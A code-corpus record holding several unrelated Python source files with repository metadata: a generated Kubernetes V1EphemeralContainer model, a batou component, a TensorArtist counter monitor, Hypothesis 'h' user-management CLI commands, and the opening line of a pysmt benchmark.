51c481692ab0d9c71b9dd96342bfa93b721b029d
|
[
"Apache-2.0"
] | 1
|
2022-02-22T23:10:55.000Z
|
2022-02-22T23:10:55.000Z
|
kubernetes/client/models/v1_ephemeral_container.py
|
philipp-sontag-by/python
|
51c481692ab0d9c71b9dd96342bfa93b721b029d
|
[
"Apache-2.0"
] | 6
|
2021-09-13T19:03:02.000Z
|
2022-03-16T18:56:42.000Z
|
kubernetes/client/models/v1_ephemeral_container.py
|
philipp-sontag-by/python
|
51c481692ab0d9c71b9dd96342bfa93b721b029d
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.23
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V1EphemeralContainer(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'args': 'list[str]',
'command': 'list[str]',
'env': 'list[V1EnvVar]',
'env_from': 'list[V1EnvFromSource]',
'image': 'str',
'image_pull_policy': 'str',
'lifecycle': 'V1Lifecycle',
'liveness_probe': 'V1Probe',
'name': 'str',
'ports': 'list[V1ContainerPort]',
'readiness_probe': 'V1Probe',
'resources': 'V1ResourceRequirements',
'security_context': 'V1SecurityContext',
'startup_probe': 'V1Probe',
'stdin': 'bool',
'stdin_once': 'bool',
'target_container_name': 'str',
'termination_message_path': 'str',
'termination_message_policy': 'str',
'tty': 'bool',
'volume_devices': 'list[V1VolumeDevice]',
'volume_mounts': 'list[V1VolumeMount]',
'working_dir': 'str'
}
attribute_map = {
'args': 'args',
'command': 'command',
'env': 'env',
'env_from': 'envFrom',
'image': 'image',
'image_pull_policy': 'imagePullPolicy',
'lifecycle': 'lifecycle',
'liveness_probe': 'livenessProbe',
'name': 'name',
'ports': 'ports',
'readiness_probe': 'readinessProbe',
'resources': 'resources',
'security_context': 'securityContext',
'startup_probe': 'startupProbe',
'stdin': 'stdin',
'stdin_once': 'stdinOnce',
'target_container_name': 'targetContainerName',
'termination_message_path': 'terminationMessagePath',
'termination_message_policy': 'terminationMessagePolicy',
'tty': 'tty',
'volume_devices': 'volumeDevices',
'volume_mounts': 'volumeMounts',
'working_dir': 'workingDir'
}
def __init__(self, args=None, command=None, env=None, env_from=None, image=None, image_pull_policy=None, lifecycle=None, liveness_probe=None, name=None, ports=None, readiness_probe=None, resources=None, security_context=None, startup_probe=None, stdin=None, stdin_once=None, target_container_name=None, termination_message_path=None, termination_message_policy=None, tty=None, volume_devices=None, volume_mounts=None, working_dir=None, local_vars_configuration=None): # noqa: E501
"""V1EphemeralContainer - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._args = None
self._command = None
self._env = None
self._env_from = None
self._image = None
self._image_pull_policy = None
self._lifecycle = None
self._liveness_probe = None
self._name = None
self._ports = None
self._readiness_probe = None
self._resources = None
self._security_context = None
self._startup_probe = None
self._stdin = None
self._stdin_once = None
self._target_container_name = None
self._termination_message_path = None
self._termination_message_policy = None
self._tty = None
self._volume_devices = None
self._volume_mounts = None
self._working_dir = None
self.discriminator = None
if args is not None:
self.args = args
if command is not None:
self.command = command
if env is not None:
self.env = env
if env_from is not None:
self.env_from = env_from
if image is not None:
self.image = image
if image_pull_policy is not None:
self.image_pull_policy = image_pull_policy
if lifecycle is not None:
self.lifecycle = lifecycle
if liveness_probe is not None:
self.liveness_probe = liveness_probe
self.name = name
if ports is not None:
self.ports = ports
if readiness_probe is not None:
self.readiness_probe = readiness_probe
if resources is not None:
self.resources = resources
if security_context is not None:
self.security_context = security_context
if startup_probe is not None:
self.startup_probe = startup_probe
if stdin is not None:
self.stdin = stdin
if stdin_once is not None:
self.stdin_once = stdin_once
if target_container_name is not None:
self.target_container_name = target_container_name
if termination_message_path is not None:
self.termination_message_path = termination_message_path
if termination_message_policy is not None:
self.termination_message_policy = termination_message_policy
if tty is not None:
self.tty = tty
if volume_devices is not None:
self.volume_devices = volume_devices
if volume_mounts is not None:
self.volume_mounts = volume_mounts
if working_dir is not None:
self.working_dir = working_dir
@property
def args(self):
"""Gets the args of this V1EphemeralContainer. # noqa: E501
Arguments to the entrypoint. The docker image's CMD is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container's environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. \"$$(VAR_NAME)\" will produce the string literal \"$(VAR_NAME)\". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell # noqa: E501
:return: The args of this V1EphemeralContainer. # noqa: E501
:rtype: list[str]
"""
return self._args
@args.setter
def args(self, args):
"""Sets the args of this V1EphemeralContainer.
Arguments to the entrypoint. The docker image's CMD is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container's environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. \"$$(VAR_NAME)\" will produce the string literal \"$(VAR_NAME)\". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell # noqa: E501
:param args: The args of this V1EphemeralContainer. # noqa: E501
:type: list[str]
"""
self._args = args
@property
def command(self):
"""Gets the command of this V1EphemeralContainer. # noqa: E501
Entrypoint array. Not executed within a shell. The docker image's ENTRYPOINT is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container's environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. \"$$(VAR_NAME)\" will produce the string literal \"$(VAR_NAME)\". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell # noqa: E501
:return: The command of this V1EphemeralContainer. # noqa: E501
:rtype: list[str]
"""
return self._command
@command.setter
def command(self, command):
"""Sets the command of this V1EphemeralContainer.
Entrypoint array. Not executed within a shell. The docker image's ENTRYPOINT is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container's environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. \"$$(VAR_NAME)\" will produce the string literal \"$(VAR_NAME)\". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell # noqa: E501
:param command: The command of this V1EphemeralContainer. # noqa: E501
:type: list[str]
"""
self._command = command
@property
def env(self):
"""Gets the env of this V1EphemeralContainer. # noqa: E501
List of environment variables to set in the container. Cannot be updated. # noqa: E501
:return: The env of this V1EphemeralContainer. # noqa: E501
:rtype: list[V1EnvVar]
"""
return self._env
@env.setter
def env(self, env):
"""Sets the env of this V1EphemeralContainer.
List of environment variables to set in the container. Cannot be updated. # noqa: E501
:param env: The env of this V1EphemeralContainer. # noqa: E501
:type: list[V1EnvVar]
"""
self._env = env
@property
def env_from(self):
"""Gets the env_from of this V1EphemeralContainer. # noqa: E501
List of sources to populate environment variables in the container. The keys defined within a source must be a C_IDENTIFIER. All invalid keys will be reported as an event when the container is starting. When a key exists in multiple sources, the value associated with the last source will take precedence. Values defined by an Env with a duplicate key will take precedence. Cannot be updated. # noqa: E501
:return: The env_from of this V1EphemeralContainer. # noqa: E501
:rtype: list[V1EnvFromSource]
"""
return self._env_from
@env_from.setter
def env_from(self, env_from):
"""Sets the env_from of this V1EphemeralContainer.
List of sources to populate environment variables in the container. The keys defined within a source must be a C_IDENTIFIER. All invalid keys will be reported as an event when the container is starting. When a key exists in multiple sources, the value associated with the last source will take precedence. Values defined by an Env with a duplicate key will take precedence. Cannot be updated. # noqa: E501
:param env_from: The env_from of this V1EphemeralContainer. # noqa: E501
:type: list[V1EnvFromSource]
"""
self._env_from = env_from
@property
def image(self):
"""Gets the image of this V1EphemeralContainer. # noqa: E501
Docker image name. More info: https://kubernetes.io/docs/concepts/containers/images # noqa: E501
:return: The image of this V1EphemeralContainer. # noqa: E501
:rtype: str
"""
return self._image
@image.setter
def image(self, image):
"""Sets the image of this V1EphemeralContainer.
Docker image name. More info: https://kubernetes.io/docs/concepts/containers/images # noqa: E501
:param image: The image of this V1EphemeralContainer. # noqa: E501
:type: str
"""
self._image = image
@property
def image_pull_policy(self):
"""Gets the image_pull_policy of this V1EphemeralContainer. # noqa: E501
Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. Cannot be updated. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images Possible enum values: - `\"Always\"` means that kubelet always attempts to pull the latest image. Container will fail If the pull fails. - `\"IfNotPresent\"` means that kubelet pulls if the image isn't present on disk. Container will fail if the image isn't present and the pull fails. - `\"Never\"` means that kubelet never pulls an image, but only uses a local image. Container will fail if the image isn't present # noqa: E501
:return: The image_pull_policy of this V1EphemeralContainer. # noqa: E501
:rtype: str
"""
return self._image_pull_policy
@image_pull_policy.setter
def image_pull_policy(self, image_pull_policy):
"""Sets the image_pull_policy of this V1EphemeralContainer.
Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. Cannot be updated. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images Possible enum values: - `\"Always\"` means that kubelet always attempts to pull the latest image. Container will fail If the pull fails. - `\"IfNotPresent\"` means that kubelet pulls if the image isn't present on disk. Container will fail if the image isn't present and the pull fails. - `\"Never\"` means that kubelet never pulls an image, but only uses a local image. Container will fail if the image isn't present # noqa: E501
:param image_pull_policy: The image_pull_policy of this V1EphemeralContainer. # noqa: E501
:type: str
"""
allowed_values = ["Always", "IfNotPresent", "Never"] # noqa: E501
if self.local_vars_configuration.client_side_validation and image_pull_policy not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `image_pull_policy` ({0}), must be one of {1}" # noqa: E501
.format(image_pull_policy, allowed_values)
)
self._image_pull_policy = image_pull_policy
@property
def lifecycle(self):
"""Gets the lifecycle of this V1EphemeralContainer. # noqa: E501
:return: The lifecycle of this V1EphemeralContainer. # noqa: E501
:rtype: V1Lifecycle
"""
return self._lifecycle
@lifecycle.setter
def lifecycle(self, lifecycle):
"""Sets the lifecycle of this V1EphemeralContainer.
:param lifecycle: The lifecycle of this V1EphemeralContainer. # noqa: E501
:type: V1Lifecycle
"""
self._lifecycle = lifecycle
@property
def liveness_probe(self):
"""Gets the liveness_probe of this V1EphemeralContainer. # noqa: E501
:return: The liveness_probe of this V1EphemeralContainer. # noqa: E501
:rtype: V1Probe
"""
return self._liveness_probe
@liveness_probe.setter
def liveness_probe(self, liveness_probe):
"""Sets the liveness_probe of this V1EphemeralContainer.
:param liveness_probe: The liveness_probe of this V1EphemeralContainer. # noqa: E501
:type: V1Probe
"""
self._liveness_probe = liveness_probe
@property
def name(self):
"""Gets the name of this V1EphemeralContainer. # noqa: E501
Name of the ephemeral container specified as a DNS_LABEL. This name must be unique among all containers, init containers and ephemeral containers. # noqa: E501
:return: The name of this V1EphemeralContainer. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this V1EphemeralContainer.
Name of the ephemeral container specified as a DNS_LABEL. This name must be unique among all containers, init containers and ephemeral containers. # noqa: E501
:param name: The name of this V1EphemeralContainer. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and name is None: # noqa: E501
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def ports(self):
"""Gets the ports of this V1EphemeralContainer. # noqa: E501
Ports are not allowed for ephemeral containers. # noqa: E501
:return: The ports of this V1EphemeralContainer. # noqa: E501
:rtype: list[V1ContainerPort]
"""
return self._ports
@ports.setter
def ports(self, ports):
"""Sets the ports of this V1EphemeralContainer.
Ports are not allowed for ephemeral containers. # noqa: E501
:param ports: The ports of this V1EphemeralContainer. # noqa: E501
:type: list[V1ContainerPort]
"""
self._ports = ports
@property
def readiness_probe(self):
"""Gets the readiness_probe of this V1EphemeralContainer. # noqa: E501
:return: The readiness_probe of this V1EphemeralContainer. # noqa: E501
:rtype: V1Probe
"""
return self._readiness_probe
@readiness_probe.setter
def readiness_probe(self, readiness_probe):
"""Sets the readiness_probe of this V1EphemeralContainer.
:param readiness_probe: The readiness_probe of this V1EphemeralContainer. # noqa: E501
:type: V1Probe
"""
self._readiness_probe = readiness_probe
@property
def resources(self):
"""Gets the resources of this V1EphemeralContainer. # noqa: E501
:return: The resources of this V1EphemeralContainer. # noqa: E501
:rtype: V1ResourceRequirements
"""
return self._resources
@resources.setter
def resources(self, resources):
"""Sets the resources of this V1EphemeralContainer.
:param resources: The resources of this V1EphemeralContainer. # noqa: E501
:type: V1ResourceRequirements
"""
self._resources = resources
@property
def security_context(self):
"""Gets the security_context of this V1EphemeralContainer. # noqa: E501
:return: The security_context of this V1EphemeralContainer. # noqa: E501
:rtype: V1SecurityContext
"""
return self._security_context
@security_context.setter
def security_context(self, security_context):
"""Sets the security_context of this V1EphemeralContainer.
:param security_context: The security_context of this V1EphemeralContainer. # noqa: E501
:type: V1SecurityContext
"""
self._security_context = security_context
@property
def startup_probe(self):
"""Gets the startup_probe of this V1EphemeralContainer. # noqa: E501
:return: The startup_probe of this V1EphemeralContainer. # noqa: E501
:rtype: V1Probe
"""
return self._startup_probe
@startup_probe.setter
def startup_probe(self, startup_probe):
"""Sets the startup_probe of this V1EphemeralContainer.
:param startup_probe: The startup_probe of this V1EphemeralContainer. # noqa: E501
:type: V1Probe
"""
self._startup_probe = startup_probe
@property
def stdin(self):
"""Gets the stdin of this V1EphemeralContainer. # noqa: E501
Whether this container should allocate a buffer for stdin in the container runtime. If this is not set, reads from stdin in the container will always result in EOF. Default is false. # noqa: E501
:return: The stdin of this V1EphemeralContainer. # noqa: E501
:rtype: bool
"""
return self._stdin
@stdin.setter
def stdin(self, stdin):
"""Sets the stdin of this V1EphemeralContainer.
Whether this container should allocate a buffer for stdin in the container runtime. If this is not set, reads from stdin in the container will always result in EOF. Default is false. # noqa: E501
:param stdin: The stdin of this V1EphemeralContainer. # noqa: E501
:type: bool
"""
self._stdin = stdin
@property
def stdin_once(self):
"""Gets the stdin_once of this V1EphemeralContainer. # noqa: E501
Whether the container runtime should close the stdin channel after it has been opened by a single attach. When stdin is true the stdin stream will remain open across multiple attach sessions. If stdinOnce is set to true, stdin is opened on container start, is empty until the first client attaches to stdin, and then remains open and accepts data until the client disconnects, at which time stdin is closed and remains closed until the container is restarted. If this flag is false, a container processes that reads from stdin will never receive an EOF. Default is false # noqa: E501
:return: The stdin_once of this V1EphemeralContainer. # noqa: E501
:rtype: bool
"""
return self._stdin_once
@stdin_once.setter
def stdin_once(self, stdin_once):
"""Sets the stdin_once of this V1EphemeralContainer.
Whether the container runtime should close the stdin channel after it has been opened by a single attach. When stdin is true the stdin stream will remain open across multiple attach sessions. If stdinOnce is set to true, stdin is opened on container start, is empty until the first client attaches to stdin, and then remains open and accepts data until the client disconnects, at which time stdin is closed and remains closed until the container is restarted. If this flag is false, a container processes that reads from stdin will never receive an EOF. Default is false # noqa: E501
:param stdin_once: The stdin_once of this V1EphemeralContainer. # noqa: E501
:type: bool
"""
self._stdin_once = stdin_once
@property
def target_container_name(self):
"""Gets the target_container_name of this V1EphemeralContainer. # noqa: E501
If set, the name of the container from PodSpec that this ephemeral container targets. The ephemeral container will be run in the namespaces (IPC, PID, etc) of this container. If not set then the ephemeral container uses the namespaces configured in the Pod spec. The container runtime must implement support for this feature. If the runtime does not support namespace targeting then the result of setting this field is undefined. # noqa: E501
:return: The target_container_name of this V1EphemeralContainer. # noqa: E501
:rtype: str
"""
return self._target_container_name
@target_container_name.setter
def target_container_name(self, target_container_name):
"""Sets the target_container_name of this V1EphemeralContainer.
If set, the name of the container from PodSpec that this ephemeral container targets. The ephemeral container will be run in the namespaces (IPC, PID, etc) of this container. If not set then the ephemeral container uses the namespaces configured in the Pod spec. The container runtime must implement support for this feature. If the runtime does not support namespace targeting then the result of setting this field is undefined. # noqa: E501
:param target_container_name: The target_container_name of this V1EphemeralContainer. # noqa: E501
:type: str
"""
self._target_container_name = target_container_name
@property
def termination_message_path(self):
"""Gets the termination_message_path of this V1EphemeralContainer. # noqa: E501
Optional: Path at which the file to which the container's termination message will be written is mounted into the container's filesystem. Message written is intended to be brief final status, such as an assertion failure message. Will be truncated by the node if greater than 4096 bytes. The total message length across all containers will be limited to 12kb. Defaults to /dev/termination-log. Cannot be updated. # noqa: E501
:return: The termination_message_path of this V1EphemeralContainer. # noqa: E501
:rtype: str
"""
return self._termination_message_path
@termination_message_path.setter
def termination_message_path(self, termination_message_path):
"""Sets the termination_message_path of this V1EphemeralContainer.
Optional: Path at which the file to which the container's termination message will be written is mounted into the container's filesystem. Message written is intended to be brief final status, such as an assertion failure message. Will be truncated by the node if greater than 4096 bytes. The total message length across all containers will be limited to 12kb. Defaults to /dev/termination-log. Cannot be updated. # noqa: E501
:param termination_message_path: The termination_message_path of this V1EphemeralContainer. # noqa: E501
:type: str
"""
self._termination_message_path = termination_message_path
@property
def termination_message_policy(self):
"""Gets the termination_message_policy of this V1EphemeralContainer. # noqa: E501
Indicate how the termination message should be populated. File will use the contents of terminationMessagePath to populate the container status message on both success and failure. FallbackToLogsOnError will use the last chunk of container log output if the termination message file is empty and the container exited with an error. The log output is limited to 2048 bytes or 80 lines, whichever is smaller. Defaults to File. Cannot be updated. Possible enum values: - `\"FallbackToLogsOnError\"` will read the most recent contents of the container logs for the container status message when the container exits with an error and the terminationMessagePath has no contents. - `\"File\"` is the default behavior and will set the container status message to the contents of the container's terminationMessagePath when the container exits. # noqa: E501
:return: The termination_message_policy of this V1EphemeralContainer. # noqa: E501
:rtype: str
"""
return self._termination_message_policy
@termination_message_policy.setter
def termination_message_policy(self, termination_message_policy):
"""Sets the termination_message_policy of this V1EphemeralContainer.
Indicate how the termination message should be populated. File will use the contents of terminationMessagePath to populate the container status message on both success and failure. FallbackToLogsOnError will use the last chunk of container log output if the termination message file is empty and the container exited with an error. The log output is limited to 2048 bytes or 80 lines, whichever is smaller. Defaults to File. Cannot be updated. Possible enum values: - `\"FallbackToLogsOnError\"` will read the most recent contents of the container logs for the container status message when the container exits with an error and the terminationMessagePath has no contents. - `\"File\"` is the default behavior and will set the container status message to the contents of the container's terminationMessagePath when the container exits. # noqa: E501
:param termination_message_policy: The termination_message_policy of this V1EphemeralContainer. # noqa: E501
:type: str
"""
allowed_values = ["FallbackToLogsOnError", "File"] # noqa: E501
if self.local_vars_configuration.client_side_validation and termination_message_policy not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `termination_message_policy` ({0}), must be one of {1}" # noqa: E501
.format(termination_message_policy, allowed_values)
)
self._termination_message_policy = termination_message_policy
@property
def tty(self):
"""Gets the tty of this V1EphemeralContainer. # noqa: E501
Whether this container should allocate a TTY for itself, also requires 'stdin' to be true. Default is false. # noqa: E501
:return: The tty of this V1EphemeralContainer. # noqa: E501
:rtype: bool
"""
return self._tty
@tty.setter
def tty(self, tty):
"""Sets the tty of this V1EphemeralContainer.
Whether this container should allocate a TTY for itself, also requires 'stdin' to be true. Default is false. # noqa: E501
:param tty: The tty of this V1EphemeralContainer. # noqa: E501
:type: bool
"""
self._tty = tty
@property
def volume_devices(self):
"""Gets the volume_devices of this V1EphemeralContainer. # noqa: E501
volumeDevices is the list of block devices to be used by the container. # noqa: E501
:return: The volume_devices of this V1EphemeralContainer. # noqa: E501
:rtype: list[V1VolumeDevice]
"""
return self._volume_devices
@volume_devices.setter
def volume_devices(self, volume_devices):
"""Sets the volume_devices of this V1EphemeralContainer.
volumeDevices is the list of block devices to be used by the container. # noqa: E501
:param volume_devices: The volume_devices of this V1EphemeralContainer. # noqa: E501
:type: list[V1VolumeDevice]
"""
self._volume_devices = volume_devices
@property
def volume_mounts(self):
"""Gets the volume_mounts of this V1EphemeralContainer. # noqa: E501
Pod volumes to mount into the container's filesystem. Subpath mounts are not allowed for ephemeral containers. Cannot be updated. # noqa: E501
:return: The volume_mounts of this V1EphemeralContainer. # noqa: E501
:rtype: list[V1VolumeMount]
"""
return self._volume_mounts
@volume_mounts.setter
def volume_mounts(self, volume_mounts):
"""Sets the volume_mounts of this V1EphemeralContainer.
Pod volumes to mount into the container's filesystem. Subpath mounts are not allowed for ephemeral containers. Cannot be updated. # noqa: E501
:param volume_mounts: The volume_mounts of this V1EphemeralContainer. # noqa: E501
:type: list[V1VolumeMount]
"""
self._volume_mounts = volume_mounts
@property
def working_dir(self):
"""Gets the working_dir of this V1EphemeralContainer. # noqa: E501
Container's working directory. If not specified, the container runtime's default will be used, which might be configured in the container image. Cannot be updated. # noqa: E501
:return: The working_dir of this V1EphemeralContainer. # noqa: E501
:rtype: str
"""
return self._working_dir
@working_dir.setter
def working_dir(self, working_dir):
"""Sets the working_dir of this V1EphemeralContainer.
Container's working directory. If not specified, the container runtime's default will be used, which might be configured in the container image. Cannot be updated. # noqa: E501
:param working_dir: The working_dir of this V1EphemeralContainer. # noqa: E501
:type: str
"""
self._working_dir = working_dir
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1EphemeralContainer):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1EphemeralContainer):
return True
return self.to_dict() != other.to_dict()
| 45.191892
| 860
| 0.68112
|
8f77ebfc1eb1f57c8972ea052d11de4c85a4e110
| 397
|
py
|
Python
|
examples/tutorial-component/components/tick/component.py
|
frlan/batou
|
895960fb1a7fc14c1a2bfbbca13d96d6ec8b0f53
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
examples/tutorial-component/components/tick/component.py
|
frlan/batou
|
895960fb1a7fc14c1a2bfbbca13d96d6ec8b0f53
|
[
"BSD-2-Clause-FreeBSD"
] | 5
|
2021-03-20T05:08:49.000Z
|
2021-06-02T03:20:17.000Z
|
examples/tutorial-component/components/tick/component.py
|
ZeitOnline/batou
|
cade3526e7979a53d47bb020c5191702972ff2ff
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
from batou.component import Component
from batou.lib.file import File
class Tick(Component):
def configure(self):
tick = File('tick.sh',
source='tick.sh',
mode=0o755)
self += tick
self.provide('programs',
dict(name='tick',
path=tick.path,
priority=10))
| 24.8125
| 41
| 0.476071
|
4ca67006d1a58a39ac3a9da27d569c0cfeb8face
| 2,535
|
py
|
Python
|
TensorArtist/tartist/core/utils/concurrent_monitor.py
|
cosmic119/DiscoGAN
|
5a86f36f45a3dafdc028fc2100eb477e54dc83cd
|
[
"MIT"
] | null | null | null |
TensorArtist/tartist/core/utils/concurrent_monitor.py
|
cosmic119/DiscoGAN
|
5a86f36f45a3dafdc028fc2100eb477e54dc83cd
|
[
"MIT"
] | null | null | null |
TensorArtist/tartist/core/utils/concurrent_monitor.py
|
cosmic119/DiscoGAN
|
5a86f36f45a3dafdc028fc2100eb477e54dc83cd
|
[
"MIT"
] | null | null | null |
# -*- coding:utf8 -*-
# File : concurrent_monitor.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 6/21/17
#
# This file is part of TensorArtist.
import itertools
import threading
import collections
import time
__all__ = ['TSCounter', 'TSCounterMonitor']
class TSCounter(object):
def __init__(self):
self._cnt = itertools.count()
self._ref = itertools.count()
self._iter_cnt = iter(self._cnt)
self._iter_ref = iter(self._ref)
def tick(self):
next(self._iter_cnt)
def get(self):
ref = next(self._iter_ref)
cnt = next(self._iter_cnt)
return cnt - ref
class TSCounterMonitor(object):
_displayer = None
def __init__(self, counters=None, display_names=None, interval=1, printf=None):
if counters is None:
counters = ['DEFAULT']
self._display_names = display_names
self._counters = collections.OrderedDict([(n, TSCounter()) for n in counters])
self._interval = interval
self._printf = printf
if self._printf is None:
from ..logger import get_logger
logger = get_logger(__file__)
self._printf = logger.info
@property
def _counter_names(self):
return list(self._counters.keys())
def tick(self, name=None):
if len(self._counter_names) == 1:
self._counters[self._counter_names[0]].tick()
else:
assert name is None, 'Must provide name if there are multiple counters.'
self._counters[name].tick()
def start(self):
self._displayer = threading.Thread(target=self._display_thread, daemon=True)
self._displayer.start()
return self
def _display(self, deltas, interval):
names = self._display_names or self._counter_names
if len(names) == 1:
self._printf('Counter monitor {}: {} ticks/s.'.format(names[0], deltas[0]/interval))
else:
log_strs = ['Counter monitor:']
for n, v in zip(names, deltas):
log_strs.append('\t{}: {} ticks/s'.format(n, v/interval))
self._printf('\n'.join(log_strs))
def _display_thread(self):
prev = [c.get() for _, c in self._counters.items()]
while True:
time.sleep(self._interval)
curr = [c.get() for _, c in self._counters.items()]
deltas = [c - p for p, c in zip(prev, curr)]
prev = curr
self._display(deltas, self._interval)
| 30.178571
| 96
| 0.601972
|
c8ad1b9ec2dc304d68592908619834cc252a3c15
| 3,687
|
py
|
Python
|
h/cli/commands/user.py
|
kevinjalbert/h
|
0f260bf59847f27eff720eeb3c3b2468571412b2
|
[
"BSD-2-Clause"
] | 1
|
2020-06-19T01:49:39.000Z
|
2020-06-19T01:49:39.000Z
|
h/cli/commands/user.py
|
kevinjalbert/h
|
0f260bf59847f27eff720eeb3c3b2468571412b2
|
[
"BSD-2-Clause"
] | 5
|
2020-03-24T18:14:50.000Z
|
2022-03-02T06:56:50.000Z
|
h/cli/commands/user.py
|
liquidinvestigations/hypothesis-h
|
2eebc0b20823fc5bc42a8e8c33551a6d448ad6ba
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import click
import sqlalchemy
from h import models
@click.group()
def user():
"""Manage users."""
@user.command()
@click.option("--username", prompt=True)
@click.option("--email", prompt=True)
@click.option("--authority")
@click.password_option()
@click.pass_context
def add(ctx, username, email, password, authority):
"""Create a new user."""
request = ctx.obj["bootstrap"]()
signup_service = request.find_service(name="user_signup")
signup_kwargs = {
"username": username,
"email": email,
"password": password,
"require_activation": False,
}
if authority:
signup_kwargs["authority"] = authority
signup_service.signup(**signup_kwargs)
try:
request.tm.commit()
except sqlalchemy.exc.IntegrityError as err:
upstream_error = "\n".join(" " + line for line in str(err).split("\n"))
message = "could not create user due to integrity constraint.\n\n{}".format(
upstream_error
)
raise click.ClickException(message)
click.echo("{username} created".format(username=username), err=True)
@user.command()
@click.argument("username")
@click.option("--authority")
@click.option("--on/--off", default=True)
@click.pass_context
def admin(ctx, username, authority, on):
"""
Make a user an admin.
You must specify the username of a user which you wish to give
administrative privileges.
"""
request = ctx.obj["bootstrap"]()
if not authority:
authority = request.default_authority
user = models.User.get_by_username(request.db, username, authority)
if user is None:
msg = 'no user with username "{}" and authority "{}"'.format(
username, authority
)
raise click.ClickException(msg)
user.admin = on
request.tm.commit()
click.echo(
"{username} is now {status}an administrator".format(
username=username, status="" if on else "NOT "
),
err=True,
)
@user.command()
@click.argument("username")
@click.option("--authority")
@click.password_option()
@click.pass_context
def password(ctx, username, authority, password):
"""
Change user's password.
You must specify the username of a user whose password you want to change.
"""
request = ctx.obj["bootstrap"]()
password_service = request.find_service(name="user_password")
if not authority:
authority = request.default_authority
user = models.User.get_by_username(request.db, username, authority)
if user is None:
msg = 'no user with username "{}" and authority "{}"'.format(
username, authority
)
raise click.ClickException(msg)
password_service.update_password(user, password)
request.tm.commit()
click.echo("Password changed for {}".format(username), err=True)
@user.command()
@click.argument("username")
@click.option("--authority")
@click.pass_context
def delete(ctx, username, authority):
"""
Deletes a user with all their group memberships and annotations.
You must specify the username of a user to delete.
"""
request = ctx.obj["bootstrap"]()
if not authority:
authority = request.default_authority
user = models.User.get_by_username(request.db, username, authority)
if user is None:
msg = 'no user with username "{}" and authority "{}"'.format(
username, authority
)
raise click.ClickException(msg)
svc = request.find_service(name="delete_user")
svc.delete(user)
request.tm.commit()
click.echo("User {} deleted.".format(username), err=True)
| 25.964789
| 84
| 0.64741
|
594ff91750ef735aa69fdc0c53c9ce879eeec78d
| 4,114
|
py
|
Python
|
benchmarks/nonlinear_software/f3/factorial.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 3
|
2021-04-23T23:29:26.000Z
|
2022-03-23T10:00:30.000Z
|
benchmarks/nonlinear_software/f3/factorial.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | null | null | null |
benchmarks/nonlinear_software/f3/factorial.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 1
|
2021-11-17T22:02:56.000Z
|
2021-11-17T22:02:56.000Z
|
import pysmt.typing as types
